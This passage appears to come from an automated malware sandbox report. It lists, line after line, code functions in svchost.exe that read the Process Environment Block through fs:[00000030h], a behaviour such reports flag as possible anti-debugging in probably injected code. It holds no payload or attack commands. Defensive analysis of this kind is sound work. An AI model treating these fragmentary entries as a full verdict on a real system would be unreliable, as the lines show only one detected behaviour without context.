Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]	2_2_03736154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]	2_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]	2_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h]	2_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]	2_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]	2_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03760124 mov eax, dword ptr fs:[00000030h]	2_2_03760124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h]	2_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]	2_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]	2_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]	2_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h]	2_2_038061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h]	2_2_037F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h]	2_2_037601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]	2_2_037F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]	2_2_037F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]	2_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]	2_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]	2_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]	2_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]	2_2_0372A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]	2_2_0372A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]	2_2_0372A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03770185 mov eax, dword ptr fs:[00000030h]	2_2_03770185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]	2_2_037EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]	2_2_037EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]	2_2_037D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]	2_2_037D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]	2_2_0375C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]	2_2_03732050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]	2_2_037B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]	2_2_037C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]	2_2_0372A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]	2_2_0372C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]	2_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]	2_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]	2_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]	2_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]	2_2_037B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0372C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]	2_2_037720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0372A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]	2_2_037380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]	2_2_037B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]	2_2_037B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]	2_2_037F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_037F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]	2_2_037C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]	2_2_0373208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]	2_2_03738770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]	2_2_03730750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]	2_2_037BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]	2_2_03772750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]	2_2_03772750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]	2_2_037B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]	2_2_0376674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]	2_2_0376674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]	2_2_0376674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]	2_2_0376273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]	2_2_0376273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]	2_2_0376273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]	2_2_037AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]	2_2_0376C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]	2_2_0376C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]	2_2_03730710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]	2_2_03760710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]	2_2_0376C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]	2_2_037347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]	2_2_037347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]	2_2_037527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]	2_2_037527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]	2_2_037527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_037BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0373C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]	2_2_037B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]	2_2_037307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E47A0 mov eax, dword ptr fs:[00000030h]	2_2_037E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]	2_2_037D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]	2_2_03762674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]	2_2_037F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]	2_2_037F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]	2_2_0376A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]	2_2_0376A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]	2_2_0374C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]	2_2_0374E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]	2_2_03766620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]	2_2_03768620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]	2_2_0373262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]	2_2_03772619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]	2_2_037AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]	2_2_037B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]	2_2_037B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0376A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0376A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]	2_2_037666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0376C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]	2_2_03734690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]	2_2_03734690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]	2_2_0376656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]	2_2_0376656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]	2_2_0376656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]	2_2_03738550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]	2_2_03738550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]	2_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]	2_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]	2_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]	2_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]	2_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]	2_2_037C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]	2_2_037325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]	2_2_0376C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]	2_2_0376C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]	2_2_037365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0376A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0376A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]	2_2_0376E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]	2_2_0376E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]	2_2_037545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]	2_2_037545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]	2_2_037B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]	2_2_037B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]	2_2_037B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]	2_2_0376E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]	2_2_03732582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]	2_2_03732582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]	2_2_03764588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]	2_2_0375A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]	2_2_0375A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]	2_2_0375A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]	2_2_037BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EA456 mov eax, dword ptr fs:[00000030h]	2_2_037EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]	2_2_0372645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]	2_2_0375245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]	2_2_0376A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]	2_2_0372E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]	2_2_0372E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]	2_2_0372E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]	2_2_0372C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]	2_2_03768402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]	2_2_03768402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]	2_2_03768402
